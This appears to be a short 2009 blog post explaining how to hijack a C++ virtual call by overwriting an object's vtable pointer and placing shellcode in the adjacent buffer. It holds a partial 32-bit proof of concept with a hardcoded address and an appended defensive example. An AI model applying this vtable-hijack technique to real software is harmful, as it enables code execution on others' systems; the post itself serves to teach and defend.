Monday, December 28, 2009

Exploiting C++ virtual functions

Object                    Vtable
------                    ------
Vtable pointer ---------> Virtual function_1 ---> Virtual function1()


#include <iostream>
#include <cstring>
using namespace std;

extern char shellcode[]; // payload bytes are not reproduced in the post; assumed to be defined elsewhere

class Failwest
{
public :
char buf[200];
virtual void test(void)
{
cout<<"Class Vtable::test()"<<endl;
}
};

Failwest overflow, *p;
void main(void)
{
char * p_vtable;
p_vtable= overflow.buf-4 ; // point to the virtual table pointer: on 32-bit MSVC the vptr is the 4 bytes just before buf
// overwrite the vptr with 0x004088cc (little-endian), the address of the fake virtual function pointer at the end of buf
p_vtable[0]=0xCC;
p_vtable[1]=0x88;
p_vtable[2]=0x40;
p_vtable[3]=0x00;
strcpy(overflow.buf, shellcode); // shellcode fills buf; its last 4 bytes hold the fake virtual function pointer
// ...... (remainder elided in the original post)
}

Layout of the object

vtable pointer
(0x004088cc)
--------------------
shellcode
--------------------
fake virtual function pointer

Flow : vtable pointer ---> fake virtual function pointer ----> shellcode
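As an added example (not code from the original post), the following shows the object layout the post relies on, a vptr integrity check that notices the kind of overwrite shown above before a virtual call would follow it, and a bounded copy into buf that cannot run past the buffer. The class Failwest is reused from the post; the helper names and the simulated overwrite are constructed for this example.

```cpp
#include <cstddef>
#include <cstring>
// Same shape as the post's class: vptr first, then the 200-byte buffer.
class Failwest {
public:
    char buf[200];
    virtual void test() {}
    Failwest() { buf[0] = '\0'; }
};

// Distance from the object start to buf: the vptr is the first word under the MSVC
// and Itanium ABIs, so 4 on the 32-bit build the post assumes (overflow.buf-4), 8 on 64-bit.
std::size_t buf_offset() {
    Failwest obj;
    return static_cast<std::size_t>(obj.buf - reinterpret_cast<char*>(&obj));
}

// Read the raw vptr word without dispatching through it.
void* read_vptr(const Failwest& obj) {
    void* vptr;
    std::memcpy(&vptr, &obj, sizeof vptr);
    return vptr;
}

// Integrity check: a live Failwest must still carry the vptr its constructor
// stored. Run before p->test(), it catches the overwrite the post performs.
bool vptr_intact(const Failwest& obj) {
    Failwest reference;
    return read_vptr(obj) == read_vptr(reference);
}

// Detection demo: zero the vptr word (a constructed stand-in for the post's
// p_vtable[] writes; no virtual call follows) and confirm the check notices.
bool simulated_overwrite_detected() {
    Failwest victim;
    std::memset(static_cast<void*>(&victim), 0, sizeof(void*));
    return !vptr_intact(victim);
}

// Hardened copy: bounded to buf and always NUL-terminated; returns true when
// the input was truncated instead of being allowed to run past buf.
bool bounded_copy(Failwest& obj, const char* src) {
    std::size_t n = std::strlen(src);
    bool truncated = n >= sizeof obj.buf;
    if (truncated) n = sizeof obj.buf - 1;
    std::memcpy(obj.buf, src, n);
    obj.buf[n] = '\0';
    return truncated;
}
```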
